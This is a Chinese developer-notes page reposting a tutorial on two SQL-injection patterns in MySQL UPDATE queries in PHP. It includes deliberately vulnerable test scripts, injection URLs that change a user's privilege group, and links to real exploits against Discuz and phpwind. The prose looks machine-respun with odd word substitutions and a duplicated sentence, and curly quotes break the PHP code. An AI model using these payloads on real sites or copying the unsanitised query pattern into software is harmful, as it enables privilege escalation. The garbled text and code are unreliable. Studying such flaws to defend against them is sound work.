热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

UPDATE注射(mysqlphp)的两个模式

脚本里只是修正user=’heige’的pass,假如groudid表现用户的权限等级,我们的目标就是通过结构$p来达

一.测试环境: 

  OS: Windowsxp sp2 

  php: php 4.3.10 ( 

  mysql 4.1.9 

  apache 1.3.33  

  二.测试数据库结构:

-----start--- 

-- 数据库: `test` 

--  

-- -------------------------------------------------------- 

--  

-- 表的结构 `userinfo` 

--  

CREATE TABLE `userinfo` ( 

`groudid` varchar(12) NOT NULL default ’1’, 

`user` varchar(12) NOT NULL default ’heige’, 

`pass` varchar(122) NOT NULL default ’123456’ 

) ENGINE=MyISAM DEFAULT CHARSET=latin1; 

--  

-- 导出表中的数据 `userinfo` 

--  

INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’); 

------end-------

三.测试模式:

  1,变量没有带’’或''[MOD1] 

//test1.php Mod1 

$servername = 'localhost'; 

$dbusername = 'root'; 

$dbpassword = ''; 

$dbname = 'test'; 

mysql_connect($servername,$dbusername,$dbpassword) or die ('数据库连接失败'); 

$sql = 'update userinfo set pass=$p where user=’heige’';//<--$P没有应用单引号 

$result = mysql_db_query($dbname, $sql); 

$userinfo = mysql_fetch_array($result); 

echo '

SQL Query:$sql

'; ?>



  脚本里只是修正user=’heige’的pass,假如groudid表现用户的权限等级,我们的目标就是通过结构$p 来达 

  到修正groupid的目标: 

  那么我们提交:http://127.0.0.1/test1.php?p=123456,groudid=1 

  在mysql里查询: mysql> select * from userinfo; 

--------- ------- -------- 

| groudid | user  | pass   | 

--------- ------- -------- 

| 1       | heige | 123456 | 

--------- ------- -------- 

1 row in set (0.01 sec)

用户heige的groudid又2改为1了 :) 

  所以我们可以得到没有’’或'' update的注射是可以成功的,这个就是我们的模式1。 

  2,变量带’’或''[MOD2]


//test2.php 

$servername = 'localhost'; 

$dbusername = 'root'; 

$dbpassword = ''; 

$dbname = 'test'; 

mysql_connect($servername,$dbusername,$dbpassword) or die ('数据库连接失败'); 


$sql = 'update userinfo set pass=’$p’ where user=’heige’';//<--$P应用单引号 

$result = mysql_db_query($dbname, $sql); 

$userinfo = mysql_fetch_array($result); 

echo '

SQL Query:$sql

'; 

?>


  为了封闭’我们结构$p应当为123456’,groudid=’2 提交: 

  http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情况下’变成了\’ 

  提交的语句变成:SQL Query:update userinfo set pass=’123456\’,groudid=\’1’ where user=’heige’

mysql查询: mysql> select * from userinfo; 

--------- ------- -------------------- 

| groudid | user  | pass               | 

--------- ------- -------------------- 

| 2       | heige | 123456’,groudid=’1 | 

--------- ------- -------------------- 

1 row in set (0.00 sec) 

  groudid并没有被修正。那么在变量被’’或''时 就完整没有被注射呢?不是 下面我们看模式2: 
//test3.php Mod2 

$servername = 'localhost'; 

$dbusername = 'root'; 

$dbpassword = ''; 

$dbname = 'test'; 

mysql_connect($servername,$dbusername,$dbpassword) or die ('数据库连接失败'); 

$sql = 'update userinfo set pass=’$p’ where user=’heige’';//<--$P应用单引号 

$result = mysql_db_query($dbname, $sql); 

mysql_fetch_array($result);    //$p的数据写进数据库 

$sql= 'select pass from userinfo where user=’heige’';  

$result = mysql_db_query($dbname, $sql); 

$userinfo=mysql_fetch_array($result);  

echo $userinfo[0];  //把pass查询输出给$userinfo[0] 

$sql ='update userinfo set pass=’$userinfo[0]’ where user=’heige’'; 

$result = mysql_db_query($dbname, $sql); 

mysql_fetch_array($result); //把$userinfo[0] 再次update 

?>

我们测试下,提交:http://127.0.0.1/test3.php?p=123456’,groudid=’1 

  回mysql查询下 : mysql> select * from userinfo; 

--------- ------- -------- 

| groudid | user  | pass   | 

--------- ------- -------- 

| 1       | heige | 123456 | 

--------- ------- -------- 



1 row in set (0.00 sec)

  HaHa~~ 成功注射 修正groudid为1。 这个就是我们的模式2了,简略的描叙如下: 

  update-->select-->update 

  四.实际模式 

  模式1:Discuz 2.0/2.2 register.php 注射  

  漏洞分析:http://4ngel.net/article/41.htm 

  Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm 

  模式2:phpwind 2.0.2和3.31e 权限晋升漏洞 


       漏洞分析: 

update (profile.php 注射变量为$proicon update语句里为,icon=’$userdb[icon]’) 





select (jop.php) 





updtate (jop.php) 



Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe  

  五.叫谢 

  特别感谢saiy等朋友的讨论和帮助。Thanks!!! 



推荐阅读
  • 本文介绍了在开发Android新闻App时,搭建本地服务器的步骤。通过使用XAMPP软件,可以一键式搭建起开发环境,包括Apache、MySQL、PHP、PERL。在本地服务器上新建数据库和表,并设置相应的属性。最后,给出了创建new表的SQL语句。这个教程适合初学者参考。 ... [详细]
  • 在说Hibernate映射前,我们先来了解下对象关系映射ORM。ORM的实现思想就是将关系数据库中表的数据映射成对象,以对象的形式展现。这样开发人员就可以把对数据库的操作转化为对 ... [详细]
  • 本文介绍了关于apache、phpmyadmin、mysql、php、emacs、path等知识点,以及如何搭建php环境。文章提供了详细的安装步骤和所需软件列表,希望能帮助读者解决与LAMP相关的技术问题。 ... [详细]
  • 如何实现织梦DedeCms全站伪静态
    本文介绍了如何通过修改织梦DedeCms源代码来实现全站伪静态,以提高管理和SEO效果。全站伪静态可以避免重复URL的问题,同时通过使用mod_rewrite伪静态模块和.htaccess正则表达式,可以更好地适应搜索引擎的需求。文章还提到了一些相关的技术和工具,如Ubuntu、qt编程、tomcat端口、爬虫、php request根目录等。 ... [详细]
  • 搭建Windows Server 2012 R2 IIS8.5+PHP(FastCGI)+MySQL环境的详细步骤
    本文详细介绍了搭建Windows Server 2012 R2 IIS8.5+PHP(FastCGI)+MySQL环境的步骤,包括环境说明、相关软件下载的地址以及所需的插件下载地址。 ... [详细]
  • 本文讨论了Alink回归预测的不完善问题,指出目前主要针对Python做案例,对其他语言支持不足。同时介绍了pom.xml文件的基本结构和使用方法,以及Maven的相关知识。最后,对Alink回归预测的未来发展提出了期待。 ... [详细]
  • 本文介绍了如何使用php限制数据库插入的条数并显示每次插入数据库之间的数据数目,以及避免重复提交的方法。同时还介绍了如何限制某一个数据库用户的并发连接数,以及设置数据库的连接数和连接超时时间的方法。最后提供了一些关于浏览器在线用户数和数据库连接数量比例的参考值。 ... [详细]
  • Metasploit攻击渗透实践
    本文介绍了Metasploit攻击渗透实践的内容和要求,包括主动攻击、针对浏览器和客户端的攻击,以及成功应用辅助模块的实践过程。其中涉及使用Hydra在不知道密码的情况下攻击metsploit2靶机获取密码,以及攻击浏览器中的tomcat服务的具体步骤。同时还讲解了爆破密码的方法和设置攻击目标主机的相关参数。 ... [详细]
  • 本文介绍了在SpringBoot中集成thymeleaf前端模版的配置步骤,包括在application.properties配置文件中添加thymeleaf的配置信息,引入thymeleaf的jar包,以及创建PageController并添加index方法。 ... [详细]
  • 本文由编程笔记小编整理,介绍了PHP中的MySQL函数库及其常用函数,包括mysql_connect、mysql_error、mysql_select_db、mysql_query、mysql_affected_row、mysql_close等。希望对读者有一定的参考价值。 ... [详细]
  • 本文介绍了在Mac上搭建php环境后无法使用localhost连接mysql的问题,并通过将localhost替换为127.0.0.1或本机IP解决了该问题。文章解释了localhost和127.0.0.1的区别,指出了使用socket方式连接导致连接失败的原因。此外,还提供了相关链接供读者深入了解。 ... [详细]
  • 本文内容为asp.net微信公众平台开发的目录汇总,包括数据库设计、多层架构框架搭建和入口实现、微信消息封装及反射赋值、关注事件、用户记录、回复文本消息、图文消息、服务搭建(接入)、自定义菜单等。同时提供了示例代码和相关的后台管理功能。内容涵盖了多个方面,适合综合运用。 ... [详细]
  • 在数据分析工作中,我们通常会遇到这样的问题,一个业务部门由若干业务组构成,需要筛选出每个业务组里业绩前N名的业务员。这其实是一个分组排序的 ... [详细]
  • Oracle Database 10g许可授予信息及高级功能详解
    本文介绍了Oracle Database 10g许可授予信息及其中的高级功能,包括数据库优化数据包、SQL访问指导、SQL优化指导、SQL优化集和重组对象。同时提供了详细说明,指导用户在Oracle Database 10g中如何使用这些功能。 ... [详细]
  • 解决VS写C#项目导入MySQL数据源报错“You have a usable connection already”问题的正确方法
    本文介绍了在VS写C#项目导入MySQL数据源时出现报错“You have a usable connection already”的问题,并给出了正确的解决方法。详细描述了问题的出现情况和报错信息,并提供了解决该问题的步骤和注意事项。 ... [详细]
author-avatar
Aries小阳光
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有